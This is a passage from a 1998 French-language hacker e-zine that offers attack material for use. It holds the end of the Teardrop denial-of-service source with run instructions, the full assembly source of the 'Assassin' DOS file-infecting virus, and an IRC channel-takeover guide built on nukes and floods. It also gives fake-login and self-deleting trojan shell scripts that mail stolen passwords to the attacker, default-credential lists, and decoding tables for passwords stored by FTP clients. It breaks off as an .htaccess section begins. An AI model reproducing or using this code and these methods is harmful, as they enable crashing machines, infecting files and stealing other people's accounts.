     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

/* 
      Fin du source de Teardrop
 */

pour utilisez ce nuke copiez le source ci-dessus et collez le dans un fichier
"teardrop.c"

loggez vous ensuite sur votre station linux et compilez le avec le GCC (compilateur
du projet GNU)

voici comment le compiler:

% gcc -O2 teardrop.c -o teardrop

copier ensuite le fichier executable teardrop dans /usr/local/bin
et faites un chmod +s teardrop
soit:
% cp teardrop /usr/local/bin
% cd /usr/local/bin
% chmod +s teardrop

desormais ou que vous soyez dans votre system en tapant "teardrop" vous 
lancerez le Nuke 
syntaxe: teardrop IP_adresse (ex: teardrop 134.59.0.1)

et voila Teardrop est capable de planter les stations sous
win95/98, winNT 4.0/5.0, OS2, MacOS, et meme certains Kernels de Linux! 
hehe le pied koi :) lol

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#05#
                   ________________________________
                  /                                \
                 /          -[ VIRUS ]-             \
                /   codes sources et compilation     \
               /________________________________ixtlan\




bah desole j'ai pas pu m'empecher :)
voici donc le source de ASSASSIN un gentil ptit virus:) heheh
copier le source dans un fichier .asm et compiler le avec n'importe quel compilateur DOS :) et voilou :)
heheh

-----------
; Assassin (Bug Fix version)
;       by Dark Slayer

mem_size equ    offset memory_end-offset start
mem_para equ    (mem_size+0fh)/10h
low_mem_size equ mem_size+100h
low_mem_para equ (low_mem_size+0fh)/10h
vir_size equ    offset vir_end-offset start
vir_sector equ  (vir_size+1ffh+2)/200h
constant_size equ offset constant-offset start

        .model  tiny
        .code
        org     0
start:
        xor     di,di
        mov     dx,ds:[di+2]
        sub     dh,5

        mov     ah,26h
        int     21h

        mov     bp,ds:[di+2ch]

        mov     ah,4ah
        mov     bx,low_mem_para
        int     21h

        mov     ah,52h
        int     21h
        mov     bx,es:[bx-2]
        mov     ax,cs
        dec     ax
mcb:
        mov     cx,ds
        mov     ds,bx
        inc     bx
        mov     dx,bx
        add     bx,ds:[di+3]
        or      bp,bp
        jnz     not_boot
        cmp     ax,bx
        jne     not_our_mcb
        add     word ptr ds:[di+3],low_mem_para+1
not_our_mcb:
        cmp     ax,cx
        jne     not_boot
        mov     ds:[di+1],dx
        mov     di,8
        push    ds
        pop     es
        mov     si,di
        mov     ds,ax
        mov     cx,di
        rep     movsb
        push    dx
        add     ax,10h+1
        push    ax
        jmp     short search
not_boot:
        cmp     byte ptr ds:[di],4dh
        je      mcb
        cmp     byte ptr ds:[di],5ah
        je      mcb
        mov     sp,low_mem_size
        sub     dx,mem_para+1
        mov     es,dx
        sub     dx,cx
        dec     dx
        mov     ds,cx
        mov     ds:[di+3],dx
        mov     si,100h
        mov     cx,vir_size
        rep     movs byte ptr es:[di],cs:[si]

        push    es
search:
        mov     ax,352ah
        int     21h
        pop     ds
        push    ds
        mov     di,offset i21_table
        mov     ds:old2a[di]-i21_table,bx
        mov     ds:old2a[di+2]-i21_table,es
        mov     ah,25h
        mov     dx,offset int2a
        int     21h
        mov     dx,bx
        push    es
        pop     ds
        int     21h
        pop     es
        lds     si,es:[di]
search_table:
        lodsw
search_table_:
        dec     si
        cmp     ax,8b2eh
        jne     search_table
        lodsw
        cmp     ah,9fh
        jne     search_table_
        movsw
        scasw
        lea     ax,[si-1e0h]
        stosw
        xchg    si,ax
        mov     word ptr ds:[si],0eacbh
        mov     word ptr ds:[si+2],offset i21_3e
        mov     ds:[si+4],es
        mov     byte ptr ds:[si+6],0eah
        mov     word ptr ds:[si+7],offset i21_3f
        mov     ds:[si+9],es
        call    set21

        mov     cx,bp
        jcxz    boot
        mov     ds,bp
        xor     si,si
l2:
        lodsw
        dec     si
        or      ax,ax
        jnz     l2
        lea     dx,[si+3]
        mov     di,offset pcb+4+100h
        push    cs
        pop     es
        mov     ax,cs
        stosw
        scasw
        stosw
        scasw
        stosw
        mov     ax,4b00h
        mov     bx,offset pcb+100h
        int     21h
        mov     ah,4dh
        int     21h
        mov     ah,4ch
        int     21h

boot:
        pop     dx
        mov     ah,26h
        int     21h
        mov     bl,3
        mov     ss:[bp+18h+5],bl
        mov     ax,1216h
        int     2fh
        inc     bp
        mov     es:[di],bp
        mov     ss,dx
        mov     ds,dx
        mov     ax,4200h
        mov     bl,5
        cwd
        int     21h
        mov     ah,3fh
        dec     cx
        inc     dh
        int     21h
        mov     ah,3eh
        int     21h
        push    ds
        pop     es
        push    ds
        push    dx
        retf

read_cmp proc
        mov     cx,vir_size
        mov     dx,cx
        push    cs
        pop     ds
        call    read
        jc      rc_exit
        push    cx
        xor     si,si
if (vir_size and 0ff00h) eq (constant_size and 0ff00h)
        mov     cl,constant_size and 0ffh
else
        mov     cx,constant_size
endif
compare:
        lodsb
        cmp     al,ds:read_buffer[si-1]
        loope   compare
        clc
        pop     cx
rc_exit:
        ret
read_cmp endp

read    proc
        push    bx
        push    dx
        push    ds
        mov     ax,1229h
        int     2fh
        pop     ds
        pop     dx
        pop     bx
        ret
read    endp

write   proc
        mov     bp,40h*2
i21_func proc
        pop     ax
        push    bx
        push    cs
        push    ax
        push    cs
        pop     ds
        push    ds:i21_far_jmp
        les     di,dword ptr ds:i21_table
        push    es
        push    es:[di+bp]
        retf
i21_func endp
write   endp

set2324_restore21 proc
        push    ds
        mov     si,23h*4
        xor     ax,ax
        mov     ds,ax
        mov     di,offset old23
        push    cs
        pop     es
        mov     ax,offset int23
        mov     bp,2
sm_23_1:
        movsw
        mov     ds:[si-2],ax
        movsw
        mov     ds:[si-2],cs
if ((int23-start) and 0ff00h) eq ((int24-start) and 0ff00h)
        mov     al,(offset int24-offset start) and 0ffh
else
        mov     ax,offset int24
endif
        dec     bp
        jnz     sm_23_1
        mov     si,di
        push    cs
        pop     ds
        mov     bp,-4
rs_1:
        inc     bp
        inc     bp
        les     di,dword ptr ds:i21_table
        mov     di,es:[di+bp+2+3eh*2]
        movsb
        movsw
        jnz     rs_1
        pop     ds

        pop     bp
        pop     ax
        push    es
        push    ax

get_sft proc
        push    bx
        mov     ax,1220h
        int     2fh
        mov     bl,es:[di]
        mov     ax,1216h
        int     2fh
        pop     bx
        jmp     bp
get_sft endp
set2324_restore21 endp

set21_restore23 proc
        mov     si,offset old23
        push    cs
        pop     ds
        mov     di,23h*4
        xor     cx,cx
        mov     es,cx
        mov     cl,4
        rep     movsw
        push    cs
        pop     es

set21   proc    ; es = vir segment
        push    ax
        mov     bx,-4
        mov     di,offset i21_3e_data
        mov     cx,es:i21_far_jmp[di]-i21_3e_data
        inc     cx
sm_1:
        inc     bx
        lds     si,dword ptr es:i21_table
        mov     ax,ds:[si+bx+3+3eh*2]
        mov     si,ax
        movsb
        movsw
        xchg    si,ax
        sub     ax,cx
        neg     ax
        mov     byte ptr ds:[si],0e9h
        mov     ds:[si+1],ax
        add     cx,5
        inc     bx
        jnz     sm_1
        pop     ax
        ret
set21   endp
set21_restore23 endp

i21_3e:
        call    set2324_restore21
        jc      jc_exit
        push    es
        pop     ds
        cmp     word ptr ds:[di],1
        jne     jne_exit
        les     ax,dword ptr ds:[di+28h]
        mov     dx,es
        cmp     ax,'OC'
        jne     exe
        mov     al,'M'
        jmp     short com
exe:
        cmp     ax,'XE'
        jne     jne_exit
com:
        cmp     dl,al
jne_exit:
        jne     jne_exit_
        les     ax,dword ptr ds:[di+11h]
        cmp     ax,vir_size
jc_exit:
        jb      jc_exit_
        cmp     ax,0ffffh-(vir_size+2)
        ja      jne_exit_
        mov     dx,es
        or      dx,dx
jne_exit_:
        jnz     i21_3e_exit
        mov     ds:[di+15h],dx
        mov     ds:[di+17h],dx
        les     si,dword ptr ds:[di+7]
        les     si,dword ptr es:[si+2]
        add     ax,si
        dec     ax
        div     si
        mov     cx,es
        inc     cx
        div     cl
        or      ah,ah
        jz      i21_3e_exit
        sub     cl,ah
        cmp     cl,vir_sector
jc_exit_:
        jb      i21_3e_exit
        les     ax,ds:[di+4]
        push    ax
        push    es
        and     ax,1000000000011100b
        jnz     close_
        mov     byte ptr ds:[di+2],2
        mov     ds:[di+4],al

        call    read_cmp
        jbe     close

        mov     si,cx
cmp_device:
        dec     si
        lodsw
        inc     ax
        loopnz  cmp_device
        jcxz    not_device
        dec     ax
        cmp     ax,ds:[si]
        je      close
        jmp     short cmp_device
not_device:
        mov     ax,es:[di+11h]
        mov     es:[di+15h],ax

        mov     cx,vir_size+2
        mov     dx,offset id
        call    write
        pop     bx
        jc      close
        sub     es:[di+11h],ax
        dec     cx
        dec     cx
        cwd
        mov     es:[di+15h],dx
        call    write
        pop     bx
close:
        push    es
        pop     ds
close_:
        pop     ds:[di+6]
        pop     ds:[di+4]
        mov     bp,0dh*2
        call    i21_func
        pop     bx
i21_3e_exit:
        mov     ax,1227h
        int     2fh
        jmp     i21_3f_exit

i21_3f:
        call    set2324_restore21

        les     ax,dword ptr es:[di+15h]
        push    ax
        push    es
        call    read
        pop     bp
        pop     si
        cmc
        jnc     jnc_exit
        test    word ptr es:[di+4],1000000000011000b
        jnz     jnz_3f_exit
        or      bp,bp
jnz_3f_exit:
        jnz     i21_3f_exit
        sub     si,vir_size
jnc_exit:
        jae     i21_3f_exit
        xor     cx,cx
        xchg    cx,es:[di+15h]
        push    cx
        xor     cx,cx
        xchg    cx,es:[di+17h]
        push    cx
        push    ax
        push    si

        push    dx
        push    ds
        call    read_cmp
        pop     ds
        pop     dx
        jc      i21_3f_exit_1
        jne     i21_3f_exit_1

        push    dx
        push    ds

        push    es
        pop     ds
        mov     ax,ds:[di+11h]
        mov     ds:[di+15h],ax
        add     word ptr ds:[di+11h],vir_size+2

        mov     cl,2
        mov     dx,offset read_buffer
        push    cs
        pop     ds
        call    read
        pop     ds
        pop     dx
        jc      i21_3f_exit_2
        cmp     word ptr cs:read_buffer,'SD'
        je      i21_3f_l0
        mov     ax,1218h
        int     2fh
        or      byte ptr ds:[si+16h],1
        jmp     short i21_3f_exit_2
i21_3f_l0:
        pop     si
        neg     si
        mov     ax,es:[di+11h]
        sub     ax,si
        mov     es:[di+15h],ax
        pop     cx
        push    cx
        push    cx
        cmp     cx,si
        jb      i21_3f_l1
        mov     cx,si
i21_3f_l1:
        call    read
i21_3f_exit_2:
        sub     word ptr es:[di+11h],vir_size+2
i21_3f_exit_1:
        pop     ax
        pop     ax
        pop     es:[di+17h]
        pop     es:[di+15h]
i21_3f_exit:
        call    set21_restore23
        push    ax
        mov     ax,1218h
        int     2fh
        mov     ax,ds:[si+16h]
        shr     ax,1
        pop     ax
        mov     ds:[si],ax
        retf

int23:
        call    set21_restore23
        jmp     dword ptr cs:old23

int24:
        xor     ax,ax
        iret
int2a:
        pop     cs:i21_table
        pop     cs:i21_table[2]
        sub     sp,4
        jmp     dword ptr cs:old2a

msg     db      ' This is [Assassin] written by Dark Slayer '
        db      'in Keelung. Taiwan <R.O.C> '

constant:

pcb     dw      0,80h,?,5ch,?,6ch,?
id      db      'DS'
vir_end:

read_buffer db  vir_size dup(?)

old2a   dw      ?,?
old23   dw      ?,?
old24   dw      ?,?
i21_3e_data db  3 dup(?)
i21_3f_data db  3 dup(?)
i21_table dw    ?,?
i21_far_jmp dw  ?

memory_end:
        end     start

---- FIN DU CODE DE ASSASSIN.ASM -----

   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#06#


  (((((((((((((((((((('''''''''''''''''''''''''))))))))))))))))))))))
  ((((((((((((((((((((       IRC TAKEOVER      ))))))))))))))))))))))
  ((((((((((((((((((((    ET AUTRES ASTUCES    ))))))))))))))))))))))
  ((((((((((((((((((((''''''''''''''''''''''''')))))))))))))){iXtlan}
  


Bon si vous lisez cet article c'est qu'apparement vous connaissez deja IRC... voila en quelques lignes comment effectuer un takeover sur un channel ;-)

mais avant tout il faut que vous ayez un ptit peu de matos:
- un client IRC of course (mIRC, BitchX, cIRCus,...)
- un script pour vous protéger (FloodProt et NetsplitDetect)
- un bon nuker (WinNuke ou Teardrop)
- quelques potes qui vous accompagnent dans le TakeOver
(optionnel: un bot type Eggdrop pret a venir sur le chan)

*** 1ere Etape: Preparation!

Bon on est samedi soir vous savez pas koi foutre, vous avez du shit, de la biere, des clopes, un ordi et un modem... 
"cool et si je me faisais un ptit IRC hackin!"
Bon vous vous connectez sur un rezo (undernet par exemple) et vous retrouvez vos cyber potes qui eux aussi sont bien chauds pour un ptit takeover sur un chan (auhazard ca tombe comme tjrs sur #kkk !!!;)

bon la phase de preparation est tres importante alors ne la negligez pas! Si vous avez un bot loggez vous tous sur le bot pour pouvoir parler penard a l'abri de regards indiscrets (eviter ainsi les IRCops qui ne peuvent pas espionner la partyline d'un eggdrop!).
Avant l'attaque il faut que tout le monde sache ce qu'il a a faire, et que chacun est bien mit s'est protections en place! faites un /names sur le channel a hacker et definissez qui fait koi (notez le IP des occupants du chan sur un notepad, histoire de gagner un peu de temp bien util)
grace a la commande /ctpc <nick> version vous pourrez savoir quels clients utilisent vos victimes, ce qui va definir quel type d'attaque utiliser...
Preparez deja vos Nukes en commencant par s'attaquer aux OPs!

*** 2eme Etape: la prise de l'Op!

Un fois que chacun sait ce qu'il a faire (qui il doit Nuker, qui il doit flooder) alors allez sur le chan mais pas tous en meme tmp! (le bot pourrait vous kicker s'il est equipe d'un TCL qui evite le MassJoin) et puis anyway ca fait tjrs suspect quand 5 ou 6 keums se pointent en meme tmp sur un chan...
aller y tranquille 2 par 2, parler avec les victimes, ayez l'air cool (on s'est jamais defois qu'il vous OP ce qui faciliterai la phase de prise de l'OP:) Pour prendre l'OP il faut descendre tous les OP (soit les flooder soit les nuker)mais evidement il faut faire ca vite! tres vite! donc pour le moment toute votre equipe doit s'appliquer a killer tous les OPs (et evidement le bot!)
Si le bot est un Eggdrop ni les nukes ni les floods ne le deconnecteront, dans ce cas ayez recours au bon vieux portfuck (precede d'un portscan pour localiser le bot sur le serveur)...

Un fois tous les OPs et le bot deconnectes attaquez vous au reste du chan, puis quand plus personnes n'est connecte (ce qui est en general assez long) alors quittez tous (sans exceptions) le channel, puis revenez... celui qui est rentre en premier aura alors l'OP et opera tout le monde, puis lancera les commandes suivantes 

/mode #kkk +b *!*@*  
  (ban tout le monde!)
/mode #kkk +islk fuck_kkk 6 
  (qui lockera le chan en invite only, mettra le clef "fuck_kkk" et      limitera le chan a 6 personnes )
/mode #kkk -b *!*@* 
  (deban le ban precedent sans risquer le retour des op officiels

vous pouvez desormais ramener votre bot sur le chan (attention il faut l'inviter avant)
/mode invite MonBot #kkk

le mettre OP et voila le chan est a vous, cool non ? ;-)
voila ceci dit faites gaffe n'abusez pas du TakeOver car les IRCops n'aiment pas ca du tout et vous risquez d'etre Glined ce qui est tjrs desagreable!

-------
NOTE: ne vous attaquez jamais a un bot X ou W!! ce sont les bots officiels d'undernet et vous seriez Glined tout de suite!!
--------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#07#

                               /"\
                              =====
                             =======
                ----------- ========= -----------
              {{{{   HACKER UN USER SUR UNIX  }}}}
                ----------- ========= -----------
                             =======
                              =====
                               \_/

[iXtlan]
(k)1998



Bon voici quelques petites techniques pour hacker le compte d'un autre utilisateur sur un system Unix/Linux...
Attention: cela ne vous permettra pas de prendre le root (a moin que l'admin system ne soit vraiment bon a rien) ...;-)

[ le Fake Login ! ]

Kesako?? hehe c'est tout simple mais ca marche 9 fois sur 10! en fait tout depend du niveau de comptence de l'utilisateur que vous avez choisi comme victime! Essayez de preference sur un utilisateur qui a l'air de ne pas savoir manier son clavier, le genre de gars a jouer a Duke Nukem toute la journée, et a surfer sur le web de microsoft a la recherche des dernieres softs pour fenetre95, enfin tu vois le genre koi UN GROS NAZE QUI COMPREND RIEN DE RIEN!!!!! (lol:P)

Bon le principe est simple: sous unix chaque connexion utilise un terminal (shell ou telnet) qui est en fait un fichier dans le rep '/dev'
chaque telnet lancé va utiliser un de ces fichier ttyXX (XX= numero du terminal)

faites un 'who' ce qui va lister les utilisateurs connectes avec leur numero de terminal...
% who

[user]  [tty]  [tmps de connexion]
-----   -----  ----------
user1   tty00    12:22 
user2   tty01    00:44 
user3   tty12    05:14
user4   tty08    01:00

voici le resultat d'une commande 'who'. On voit bien que chaque user utilise un terminal specifique (user1 utilise le tty0)hors chacun de ses terminaux est en fait un fichier /dev/ttyXX, ainsi vous pouvez ecrire sur ces fichiers ce qui s'affichera directement sur l'ecran du user qui utilise ce terminal!

voici donc ce que nous allons faire! (heheh)
on va executer un ptit script shell qui simule un Reboot du serveur et demandea l'utilisateur son Login et Password... 
voici le script deja ecrit 
 
#~/fakelogin.sh
# Ceci doit ressemblez au login du serveur a hacker...

echo "Rebooting system...."
echo " "
echo "Digital UNIX (machine.server.fr) (tty00)" 
echo " "
echo "login: \c"
read lgin
echo off 
echo "Password: \c"
read pw
echo " "
echo on
# mettez votre email
echo "Login: $lgin - Pword: $pw" | mail moi@server.fr

# fin du script

copier ce script dans un fichier fakelogin.sh (placer dans vote homedir)voila il vous suffit de faire en sorte que ce script ressemble au loggin de votre Unix et de mettre votre email puis de tapez:

% cat fakelogin.sh >/dev/ttyXX
(remplacer ttyXX par le terminal a hacke!)

et voila vous allez gentiment recevoir un mail vous donnant le login et le mot de passe de cet imbecile a qui vous venez de faire croire que le serveur a rebooter et qui lui a suivi betement les instuctions de la machine !! mdr hehe:) 

[ le fichier passwd ]

Bon evidement le plus simple pour hacker un unix est de lire directement tous les mots de passes la ou ils sont ecrit (c'est a dir dans /etc/passwd) mais bon la plus part du temp vous imaginez bien que l'admin ne laisse pas ce fichier en lecture ! ou alors il est encode ?... donc bon vous pouvez tjrs essaye

% cat /etc/passwd | more 

mais ca m'etonnerai que ca marche ou alors c'est que vous avec de la chance grave (si ca marche allez jouer a loto tout de suite!!! heheh)
Attention aux fausses joies car bien souvent le fichier passwd est encode! c'est a dire que le fichier peut etre lu mais les mots de pass sont remplaces par des '*' et les vrais pass sont dans un autre fichier qui lui n'est lisible que par le root! dommage......

[ permissions sur les homedir ]

he oui pourquoi ne pas profiter de l'oubli d'un utilisateur pour lui hacker son compte ? aller dans le repetoir des /usr (la ou sont tous les comptes des utilisateurs du system) et tapez

% ls -l | more  

ce qui listera tous les comptes avec les permissions:
---------------------
Rappel:
les permissions sur unix se font de la maniere suivante:
r = read 
w = write
x = execute

-rwxr-xr-x  signifie: -rwx (owner) r-x (group) r-x (all)
soit que ce fichier est en lecture/ecritur/exec pour le proprietaire
et en lectur/exec pour les autres

si il y a un 'd' devant cela signifie qu'il s'agit d'un repetoir
---------------------
bon voici un exemple de resultat affiche apres un 'ls -l' dans /usr

[permissions][user][date] [size]
------------  ----  ----   -----
drwxr-xr-x    bob   1998   21
drwxr-xr-x    bill  1998   11
drwxr-xr-x    Zoe   1997   05
drwxrwxrwx    fred  1998   32
drwxr-xr-x    Monic 1997   29

on voit que le homedir de fred est en drwxrwxrwx c'est a dire que vous pouvez nous seulment le lire mais aussi y ecire!!! heheh voila toute l'astuce, car Fred est surment un neophyte sur unix et il n'a pas pense a proteger son rep d'esprits malvaillants (comme vous par exemple) et l'a donc laisse en ecriture!!

vous pouvez donc installer tranquillement un ptit script dans le rep de fred de maniere a ce que celui ci l'execute et vous donne son mot de passe ! Sachez faire en sorte que fred execute ce script et aussi qu'il ne se rende pas compte qu'il est en train de lancer de lui meme un cheval de troie:)
(le mieux etant de mettre un procede d'auto destruction a la fin du script pour qu'il s'efface de lui meme:) 

voici un exemple de script a placer dans le rep de Fred:)

#!/usr/homedir/SECURITY
echo " "
echo "       SECURITY DAEMON     " 
echo " "
echo " The security Daemon has locate that your "
echo " password is unsecure please change it now!"
echo " "
echo "old Password: \c"
read pw
echo " "
echo "New Password: \c"
echo " "
echo "Thank you "
echo on
# mettez votre email
echo "Pword: $pw" | mail you@server.fr
# efface le script
rm -f SECURITY

# fin du script

une fois  que vous avez configurer ce script copier le chez fred
et rendez le executable

% cp SECURITY /usr/fred
% chmod u+x /usr/fred/SECURITY

et voila le pauvre fred une fois de plus en croyant bien faire c 'est fait pigeonner son mot de passe comme un bleu!!! heheh 

Voila pour les tekniks de hack sur Unix...
testez deja celles la ca devrait vous occuper un bon moment et y'en aura d'autres dans le numero 2 de KaotiX (a paraitre je sais pas quand :)!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#08#
             _______________________________________________
             _______________________________________________
             _______   LES DERNIERES CONNERIES  ____________
             ________        DE MICROSOFT       ____________
             _______________________________________________
             _______________________________________________
             iXtlan(k)1998


he oui comme vous le savez tous la firme du legendaire Bill Gates n'est pas en manque de conneries! Il y'a meme parait il un recrutement special d'ingenieurs aptes a creer des bugs dans les rangs des societes le plus "buggées" de l'histoire de l'informatique moderne (disons depuis 1970)...
Bref la firme au papillon (qui se dit d'ailleurs "bug" en argo americian ce qui montre bien l'orientation prise pas mephistosoft! lol:)n'est pas en mal de bug, problem, et autres conneries et ca nous fait bien rire!
Voici donc quelques une des dernieres trouvailles en matieres d'"Erreur Fatale"  de chez nos potes de "mircomou" (hmmm)

[ Windows 98 ]
bah oui vous en avez bien entendu parler quelque part de ce fameux fenetre98... non? zetes sur? bah pas grave alors vous ratez pas grand chose! Ben oui on esperait beaucoup de win98: un system vraiment 32bits, qui offre une vraie gestion multitache/multi-utilisateur (comme un unix koi!) mais non win98 n'est qu'un remake de win95 version IE4 implante d'office dans le noyau! du coup en se retrouve avec une couche HTML partout!!!! ptin c est cool ca deja que Outlook sacage les mails de codes html ce qui est franchement desagreable quand on lit les mails en telnet ! alors la ca va vraiment etre le bouquet!!! a croire que MicroMou voudrait isoler les utilisateurs de 
windaube loin des autres OS (des fois qu'ils se rendrait compte que Linux c'est mieux. Comme koi y sont pas si con chez MSoft?! (non je deconne! lol)

[ WinWord98 ]
oups... alors la franchement decu! moi qui ai toujours bcp aime word,la version 8.0 m'a carrement foutu les boules!!! Deja ce souslignage des mots qu'il connait pas c'est d'un chiant!!! meme le mot "web" il sait pas ce que c'est (comme koi chez Mephisto y zont pas la tete sur les epaules!) En plus le prog est lourd (sur un P166 sous NT winword utilise 20% des ressources machine!!!! halucinant pour un simple traitement de texte! En plus si vous editez un fichier .doc avec un simple editeur (type notepad ou vi) y'aura plein de carracteres de tabulation type "\part" au debut de chaque ligne! argg... vraiment nul ;-(

[ Schedule + ]
Alors la bravo... dans cet agenda de bureau y'a plein de champs pour mettre, les numeros de telephones domiciles, bureau1, bureau2, fax, mais pas un seul pour l'email!! non non c'est pas une blague keudale pour mettre les emails! Tu crois qu'ils savent ce que c'est un email chez mephisto?

[ IE4 et l'active desktop ]
mouaaahhha !! lol ! kel konnerie!!! non sans blague je me marre bien a chaque fois qu'on me parle de ca! Non seulement IE4 est un browser de merde (y a qu'a voir comment y swap les images) mais en plus l'active desktop c'est du genre a plante le driver de la souris a chaque boot ou a virer l'image jpeg du backgound quand ca plante!! cool non :) enfin moi j'm en fous chuis un adepte de Netscape!

[ FrontPage98]
hmmmm lol:) re lol:) re re lol:) ouarf! ouarf!!zzzzzz!!! zZzZzZ! mdr!!! heu scusez moi mais mon rire traduit ma pensee :) la c est vraiment le comble a ce demander si chez MicroSophT y zont des acces a internet! regardes le source generé d'une page HTML par FP98 (ca vaut vraiment le coup rien que pour le nombre de fois ou il se repete!) moi j'vous l'dit le mieux pour le html c'est...NOTEPAD!

voila pour les mephistreries made in microsoft
au fait "jusqu'ou irez vous?"  
pas tres loin avec toi mon billou en tous cas!!! lol:)
(rire sarcastique)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#09#


                 """""""""""""""""""""""""""""""""""""""""
                 """""""""""""""""""""""""""""""""""""""""
                 """"                                """""
                 """"  COMMENT CRACKER UN PASSWORD   """""
                 """"                                """""
                 """""""""""""" [(k)1998] """"""""""""""""
                 """""""""""""" [ Xtlan ] """"""""""""""""



hehe cracker un password est un operation redondante dans la pratique d'un hacker! Que l'on essaye un connexion telnet sur un unix distant, d'entrer un system NT, en tant qu'admin, ou simplement de decoder un pass oublier, on a tjrs besoin de savoir comment cracker un pass!

Le plus important dans la teknik du crack de mot de pass c'est les facultes mentales que l'on va develloper pour arriver a son but! Le Brain Stormin est la seule maniere fiable de cracker un pass!

Bon pour commencer dans le cas du crack d'un user sur unix il faut avant tout tester les options de bases implementes dans le system!

ainsi on essayera depuis un telnet les possibilites suivantes! (ca marche defois mais pas quand l'admin a fait son boulot!! hehe)

"----" = vide
-[ Login ]-----------[ Password ]-----
  root                root
  root                machine.server.com  
  root                nom de l'admin system
  guest               guest
  anonymous           nick@server.com
  ----                ----
  user                user
  adm                 adm
  uucp                uucp
  nuucp               anon
  anon                anon
  games               games
  install             install
  reboot              ----
  demo                demo
  umountfsys          umountfsys
  sync                sync
  admin               admin
  daemon              daemon

mais bon ca marche pas tjrs! alors la on peut utiliser un password cracker c'est a dire un programme qui va debiter tous les mots du dictionnaire en esperant tomber sur le bon!
Le seul probleme est que de plus en plus les admins conseillent (voir exigent)des utilisateurs un mot de passe comprennant au minimum 8 caracteres et des symboles non alphadecimaux par exemple "7kjf-5okLm" 
(le genre de mot qui existe pas dans le dico!)

Il est alors tmp de faire preuve de vos competences en Social Engineering (voir dans Noway N°3)... 
Soit vous connaisez physiquement la personne a qui vous essayez de cracker le compte (vous pouvez alors essayer les trucs con du genre
nom du/de la petit(e) ami(e), chanson preferee, bookin prefere, et autres conneries en tout genre)... 
Vous pouvez aussi par exemple accorder a cette personnes un acces
sur votre Eggdop (par exemple) en lui demandant un mot de passe (qui risk fort d'etre le meme que celui de son compte unix) Car les gens ont la facheuse t'endance de reutiliser les mots de pass (manque de memoir surment!) 
Bon si rien de cela ne marche va falloir que vous vous demerdiez autrement...(lisez l'article n°7 sur le hack sous unix!)

Dans le cas d'un mot de passe sur le Bios de la machine les choses sont tres compliquees! et la seul un password cracker ou votre reflexion feront que vous penetrerez ou non dans le system ....

Un bon moyen de trouver des mots de passe est de controler les fichier .ini des programmes de FTP (CuteFTP, WSftp, et autres) qui tournant sous windaube, insrcivent les mots de pass codés dans le ini. Toute la betise etant qu'ils utilisent tjrs le meme encryptage qui devient donc tres facile a decoder! hehe
Cette technique est tres utiles car les universites, facs, institus, IUT, et autres ont presque tjrs deux rezo (un NT un Unix) et donc les utilisateurs chacun un repetoir personnel sur le rezo NT... Il suffit donc de zoner un peu sur les disks pour trouver les ini des clients ftp et voila :) hehe

Voici le mode de cryptage de WsFTP  sur win95
(fichier wsftp.ini)
--------------------------------
a = 61           A = 41          0 = 30 
b = 63           B = 43          1 = 32
c = 65           C = 45          2 = 34
d = 67           D = 47          3 = 36
e = 69           E = 49          4 = 38
f = 6B           F = 4B          5 = 3A
g = 6D           G = 4D          6 = 3C
h = 6F           H = 4F          7 = 3Z 
i = 71           I = 51          8 = 40
j = 73           J = 53          9 = 42
k = 75           K = 55          & = 26 
l = 77           L = 57          é = FF
m = 79           M = 59          " = 24
n = 7B           N = 5B          ' = 2A
o = 7D           O = 5D          ( = 2C
p = 7F           P = 5F          - = 32
q = 81           Q = 61          è = FF
r = 83           R = 63          _ = 66
s = 85           S = 65          ç = FF
t = 87           T = 67          à = FF
u = 89           U = 69          ) = 33
v = 8B           V = 6B          = = 48
w = 8D           W = 6D
x = 8F           X = 6F
y = 91           Y = 71
z = 93           Z = 73

vous remarquerez d'ailleurs que certains caracteres ASCII s'encodent de la meme facon! (é,è,ç,à = FF )

voici maintenant le mode d'encryptage de CuteFTP 2.0 pour win95
(les pass sont dans le fichier tree.dat)
--------------------------------
a = ©       b = ª       c = «       d = ¬        e = ­       f = ¾
g = ¯       h =         i = ¡       j = ¢        k = £       l = ¤
m = ¥       n = ¦       o = §       p = ¸        q = ¹       r = º
s = »       t = ¼       u = ½       v = ¾        w = ¿       x = °
y = ±       z = ² 

voila faites en bonne usage!! et si vous n'arrivez pas a acceder aux fichiers qui contiennent les pass depuis Windoze essayez sous Dos (defois ca marche:)

cd /rep_du_keum
edit tree.dat > c:/mon_rep/passFTP.txt

ensuite editez le fichier passFTP.txt dans votre homedir et voilou :)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#10#

                     ________ 
                    //      \\    |-|-|-|@@@@@@@>>>>
                   /.HTACCESS ET SES FAILLES!  
                  //          \\  -
                 //____       //  |
                             //   |
                            /_____|iXtlan[98]



La protection par htaccess et celle la plus utilisée sur les serveurs unix au niveau de la consulation des sites webs... Cette fonction va demander a l'utilisateur voulant acceder a un certain reperoire de donner un Login et un Mot de Pass...

voila comment ca fonctionne:
